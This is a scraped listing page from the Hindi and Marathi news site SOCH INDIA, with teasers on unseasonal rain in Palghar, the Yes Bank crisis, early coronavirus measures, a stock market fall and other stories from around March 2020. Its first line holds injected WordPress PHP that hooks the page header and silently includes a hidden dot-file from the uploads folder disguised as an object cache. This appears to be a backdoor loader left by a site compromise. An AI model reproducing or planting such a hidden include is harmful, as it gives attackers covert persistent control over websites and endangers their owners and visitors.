add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

राज्याच्या वेगवेगळया भागात सध्या अवकाळी पाऊस हजेरी लावत आहे. पालघर तालुक्यात आज सकाळी नऊ वाजता अचानक पाऊस सुरु झाला. या पावसामुळे नागरिकांची तसेच अनेक व्यवसायिकांची भंबेरी उडाली. पालघर, माहीम, केळवे रोड इत्यादी परिसरात सुमारे दहा ते पंधरा मिनिट मुसळधार पाऊस कोसळला. राज्याच्या वेगवेगळया भागात सध्या अवकाळी पाऊस कोसळत आहे....

Read More

सुधारित नागरिकत्व कायद्यावरून देशभर गदारोळ सुरू असताना राष्ट्रीय लोकसंख्या नोंदणीबाबतचा वादही सुरू झाला असून, त्यामुळे निर्माण झालेल्या वातावरणाचा फटका पिंपरी महापालिकेच्या जनगणना पूर्वतयारीचे काम करणाऱ्या दोन अभियंत्यांना बसला. या कर्मचाऱ्यांच्या जनगणना पूर्वतयारीच्या कामाला आक्षेप घेतला गेल्याने शाब्दिक वाद झाला. दापोडीतील या घटनेची चित्रफीत सध्या समाजमाध्यमात चर्चेचा विषय ठरली आहे....

Read More

आरबीआई ने निजी क्षेत्र की कंपनी यस बैंक पर जैसे ही 50 हजार की निकासी की लिमिट लगाई, उसके ग्राहकों में हड़कंप मच गया. देश के तमाम शहरों में एटीएम के बाहर पैसे निकालने वालों की कतार लग गई. कई शहरों में अफरातफरी का माहौल भी देखने को मिला....

Read More

– वन्य प्राण्यांपासून होणाऱ्या पिकांच्या नुकसानीचाही समावेश पीक विमा योजनेत करता येईल का यावरही अभ्यास केला जाईल. पीक विमा योजनेत राज्याचाही मोठा वाटा, पण वेळेवर विमा मिळत नाही. यावर सुधारणेसाठी मंत्रीगट नेमला आहे – अस्मानी आणि सुलतानी संकटात असलेल्या शेतकऱ्यांना आम्ही कोणत्याही अटी व नियमांमध्ये न अडकवता उभं करत...

Read More

दक्षिण कोरियात करोना विषाणूची लागण झालेल्यांची संख्या आता सहा हजारांहून अधिक झाली असून अधिकाऱ्यांनी चेहऱ्यावर लावण्यात येणाऱ्या मास्कच्या निर्यातीवर बंदी घातली आहे आणि मास्कचा पुरवठा अधिक प्रमाणात होण्यासाठी अन्य पावले उचलली आहेत. जपानने आपल्या शेजारी देशातून येणाऱ्या प्रवाशांना दोन आठवडे स्वतंत्र कक्षात ठेवण्याचे ठरविले असल्याचे वृत्त ‘योमियुरी’ दैनिकाने दिले...

Read More

कोरोना का प्रकोप और यस बैंक का संकट शेयर बाजार पर कहर बनकर टूटा है. शुक्रवार को शेयर बाजार में भारी गिरावट आई है. बॉम्बे स्टॉक एक्सचेंज (BSE) का सेंसेक्स सुबह 857 अंकों की गिरावट के साथ 37,613.96 पर खुला. थोड़ी ही देर में सेंसेक्स 1400 अंक तक टूट...

Read More

एफएटीएफच्या बैठकीआधी पाकिस्तानने बेपत्ता घोषित केलेला कुख्यात दहशतवादी मसूद अझहर आता समोर आला आहे. अमेरिका-तालिबान करारावर त्याने ऑडिओच्या माध्यमातून प्रतिक्रिया दिली आहे. भारताला हवा असलेला हा मोस्ट वाँटेड दहशतवादी बेपत्ता असल्याचे पाकिस्तानने जाहीर केले होते. जैश-ए-मोहम्मद या दहशतवादी संघटनेचा प्रमुख असलेल्या मसूद अझहरने अमेरिकेबरोबर झालेल्या शांती करारासाठी तालिबानच्या आधीच्या...

Read More

छत्रपती शिवाजी महाराज यांची रणनीती राष्ट्रीय सुरक्षा सल्लागार अजित डोवाल यांना भावते. त्याबाबत त्यांनी गुरुग्राममध्ये बोलत असताना छत्रपती शिवाजी महाराज यांचं संघटन कौशल्य आणि माणसांची पारख कशी होती हे स्पष्ट केलं. गुरुग्राम येथे पोलीस एक्स्पोच्या उद्घाटन प्रसंगी ते बोलत होते. छत्रपती शिवाजी महाराजांचा आदर्श डोळ्यांसमोर ठेवा आणि कौशल्य तसंच...

Read More

सध्या जगभरात जीवघेण्या कोराना व्हायरसने धुमाकुळ घातला आहे. या पार्श्वभूमीवर आता भारतातही अधिक सतर्कता घेतली जात आहे. या जीवघेण्या विषाणूपासून बचाव करण्यासाठी सरकारकडून उपययोजना केल्या जात आहेत, शिवाय जनजागृती देखील केली जात आहे. मात्र, हा विषाणू केवळ मनुष्यामध्येच आढळतो आहे का? की पाळीव प्राणी जसे की कुत्रा-मांजर यांना देखील...

Read More

कोरोना वायरस (Coronavirus) के चलते दिल्‍ली के सभी प्राइमरी स्‍कूल 31 मार्च तक के लिए बंद कर दिए गए हैं. दिल्‍ली सरकार के शिक्षा मंत्री मनीष सिसोदिया ने कहा कि ऐहतियातन कक्षा एक से लेकर कक्षा पांचवीं तक के सभी प्राइमरी स्‍कूल बंद कर दिए गए हैं.

Read More